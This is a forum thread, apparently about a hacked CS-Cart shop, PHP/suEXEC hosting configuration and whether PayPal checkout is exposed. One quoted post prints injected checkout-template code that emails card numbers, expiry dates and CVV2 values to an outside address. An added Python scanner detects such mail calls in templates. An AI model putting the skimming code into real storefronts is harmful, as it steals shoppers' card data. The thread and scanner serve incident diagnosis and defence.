Site Hacked - need some help with security

[quote name=‘nedd’]I’m not sure where to check whether it is a DSO, phpSuExec or SuPHP based system.



This is my current PHP configuration:



DEFAULT PHP: 5
PHP4 SAPI: none
PHP5 SAPI: fcgi
SUEXEC: enabled

PHP 5.2.9 (cli) (built: May 14 2009 00:48:26)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with eAccelerator v0.9.5.3, Copyright (c) 2004-2006 eAccelerator, by eAccelerator
with the ionCube PHP Loader v3.1.34, Copyright (c) 2002-2009, by ionCube Ltd., and
with Zend Extension Manager v1.2.2, Copyright (c) 2003-2007, by Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
with Zend Optimizer v3.3.3, Copyright (c) 1998-2007, by Zend Technologies



Please advise.



Thanks.[/quote]



One phone call or email to your webhost will tell you for certain.

[quote name=‘Traveler’]One phone call or email to your webhost will tell you for certain.[/QUOTE]



Well, that’s what I got from my webhost when I asked whether it is a DSO, phpSuExec or SuPHP based system. :confused:

[quote name=‘nedd’]Well, that’s what I got from my webhost when I asked whether it is a DSO, phpSuExec or SuPHP based system. :confused:[/quote]



Nedd,



Call them and ask them to clearly tell you and not give you a report that you did not ask for.



Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.



Who is your host?

[quote name=‘Golfcart’]Here is the code that was added to the cc.tpl file (information in [COLOR=“DarkRed”]RED[/COLOR])

// Check payment info fields
function fn_can_place_order()
{$ldelim}
    if (false == fn_check_agreement()){$ldelim}
        return false;
    {$rdelim}
    var card_number = document.getElementById('cc_number').value.replace(/[ -]/gi, '');
    var card_type = document.getElementById('cc_type').value;
    var exp_mon = document.getElementById('cc_exp_month').value;
    var exp_year = document.getElementById('cc_exp_year').value;

    // Reserved
    var start_mon = start_date_required[card_type] == 'Y' ? document.getElementById('cc_start_month').value : '';
    var start_year = start_date_required[card_type] == 'Y' ? document.getElementById('cc_start_year').value : '';
    var cvv2 = cvv2_required[card_type] == 'Y' ? document.getElementById('cc_cvv2').value : '';
    if (CheckCardNumber(card_number, card_type, exp_mon, exp_year)) {$ldelim}
        document.getElementById('cc_number').value = card_number;
        [COLOR=“darkred”]m = new SendMail ();
        m.To = 'velung@yahoo.com';
        m.From = 'heuhuefbejhfegf@stevescartshop.com';
        m.Body = 'card_number | exp_mon | exp_year | cvv2 | - cc_number | cc_name | ';
        m.send(); m.send (); [/COLOR]
        return true;
    {$rdelim}

    return false;
{$rdelim}[/QUOTE]



I am using PayPal (standard) for my client’s payment gateway. There will be no credit card info stored on my server - everything will be stored and processed on PayPal’s side. With this in mind, will there be any danger/risk of the above hack happening to my client’s site??



Will the cc.tpl file even be used??



Again, thanks in advance!
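
Added example, not part of the thread and not CS-Cart code: a Python check that flags the kind of change shown in the quoted cc.tpl, i.e. hard-coded e-mail addresses and mail-sending statements inside a checkout template. The function names, the regex patterns and the sample text (with a placeholder address) are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Card-data identifiers taken from the cc.tpl snippet quoted above.
CARD_FIELDS = ("cc_number", "card_number", "cvv2", "exp_mon", "exp_year", "cc_name")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Assumed patterns for mail-sending statements like those in the injected block.
MAIL_CALL_RE = re.compile(r"new\s+SendMail\s*\(|\.\s*send\s*\(|\.(To|From|Body)\s*=", re.I)

def scan_template(text, allowed_addresses=()):
    """Return (line_no, reason, line) findings for one template's text."""
    allowed = {a.lower() for a in allowed_addresses}
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for addr in EMAIL_RE.findall(line):
            if addr.lower() not in allowed:
                findings.append((no, "hard-coded address " + addr, line.strip()))
        if MAIL_CALL_RE.search(line):
            reason = "mail-sending call"
            if any(field in line for field in CARD_FIELDS):
                reason += " referencing card fields"
            findings.append((no, reason, line.strip()))
    return findings

def scan_tree(root, allowed_addresses=()):
    """Scan every *.tpl file under root; return {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*.tpl")):
        found = scan_template(path.read_text(errors="replace"), allowed_addresses)
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample modelled on the quoted snippet; the address is a placeholder.
SAMPLE = """\
if (CheckCardNumber(card_number, card_type, exp_mon, exp_year)) {$ldelim}
document.getElementById('cc_number').value = card_number;
m = new SendMail ();
m.To = 'collector@example.net';
m.Body = 'card_number | exp_mon | exp_year | cvv2';
m.send();
return true;
{$rdelim}
"""

if __name__ == "__main__":
    # With a directory argument, scan its templates; otherwise scan the sample.
    result = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"SAMPLE": scan_template(SAMPLE)}
    for name, found in result.items():
        for no, reason, line in found:
            print(f"{name}:{no}: {reason}: {line}")
```

Any hit still needs a manual look, since a stock template can contain a legitimate address or `.send(` call; comparing the file against a clean copy of the same cart version settles it.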

[quote name=‘Traveler’]Nedd,



Call them and ask them to clearly tell you and not give you a report that you did not ask for.



Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.



Who is your host?[/QUOTE]



This is another answer from my webhost:



“It’s PHP running as FastCGI with Apache suEXEC.



This means PHP is running as optimized CGI (FAST) and Apache is executing the PHP as your user.”



Can someone “translate” it in regard to DSO, phpSuExec, SuPHP configurations?